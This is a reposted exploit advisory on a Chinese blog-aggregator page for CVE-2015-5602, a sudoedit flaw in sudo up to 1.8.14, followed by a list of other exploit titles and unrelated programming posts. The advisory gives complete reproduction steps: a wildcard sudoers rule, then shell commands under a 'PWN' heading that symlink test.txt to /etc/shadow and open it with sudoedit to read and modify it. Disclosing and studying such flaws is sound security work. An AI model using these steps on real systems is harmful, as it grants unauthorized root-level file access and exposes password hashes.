exploit - Sudo <=1.8.14 - Unauthorized Privilege
来源:互联网 发布:安卓登录注册界面源码 编辑:程序博客网 时间:2024/05/29 04:03
# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation# Date: 07-23-2015# Exploit Author: Daniel Svartman# Version: Sudo <=1.8.14# Tested on: RHEL 5/6/7 and Ubuntu (all versions)# CVE: CVE-2015-5602.Hello,I found a security bug in sudo (checked in the latest versions of sudorunning on RHEL and ubuntu) when a user is granted with root access tomodify a particular file that could be located in a subset of directories.It seems that sudoedit does not check the full path if a wildcard is usedtwice (e.g. /home/*/*/file.txt), allowing a malicious user to replace thefile.txt real file with a symbolic link to a different location (e.g./etc/shadow).I was able to perform such redirect and retrieve the data from the/etc/shadow file.In order for you to replicate this, you should configure the following linein your /etc/sudoers file:<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txtThen, logged as that user, create a subdirectory within its home folder(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic linkinside the new folder named test.txt pointing to /etc/shadow.When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you willbe allowed to access the /etc/shadow even if have not been granted withsuch access in the sudoers file.I checked this against fixed directories and files (not using a wildcard)and it does work with symbolic links created under the /home folder.
CREATE A NORMAL USER
-bash-3.2# useradd -b /home/ -c "normal user" -u 1000 -m -s /bin/bash -p password centos-bash-3.2# ls -l /home/total 8drwx------ 4 centos centos 4096 Aug 6 04:00 centos
MODIFY SUDER CONFIGURATION
centos ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
PWN
-bash-3.2# su centos[centos@lab centos]$ pwd/home/centos[centos@lab centos]$ mkdir pwn[centos@lab centos]$ cd pwn/[centos@lab pwn]$ ln -s /etc/shadow /home/centos/pwn/test.txt[centos@lab pwn]$ ls -l /home/centos/pwn/total 4lrwxrwxrwx 1 centos centos 11 Aug 6 04:04 test.txt -> /etc/shadow[centos@lab pwn]$ sudoedit /home/centos/pwn/test.txt
BINGO ! We can modify /etc/shadow now.
0 0
- exploit - Sudo <=1.8.14 - Unauthorized Privilege
- sudo protection bypass exploit
- Microsoft Windows "keybd_event" Local Privilege Escalation Exploit
- MS Windows GDI Local Privilege Escalation Exploit
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
- MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)
- MS08-066 Microsoft Ancillary Function Driver Elevation of Privilege exploit
- FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit
- Linux Kernel < 2.6.29 exit_notify() Local Privilege Escalation Exploit
- Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit
- QSEE privilege escalation vulnerability and exploit (CVE-2015-6639)
- Add sudo privilege for normal user in Ubuntu
- exploit
- exploit
- Exploit
- 如何在Android开发中使用自定义的字体库
- Num 22 : NYOJ : 0055 懒省事的小明 [ 优先队列 ]
- jquery全选
- 【Launcher 教程】从 URL Schemes 入门到用 Launcher 调用各效率软件
- Cat VS Dog
- exploit - Sudo <=1.8.14 - Unauthorized Privilege
- hdu 1213 并查集
- 句柄类
- css文字溢出显示省略号
- var_dump展示不全
- 如何取消文件的关联
- 虚函数和纯虚函数的区别
- ER图简明教程
- Android lint优化 Improving Your Code with lint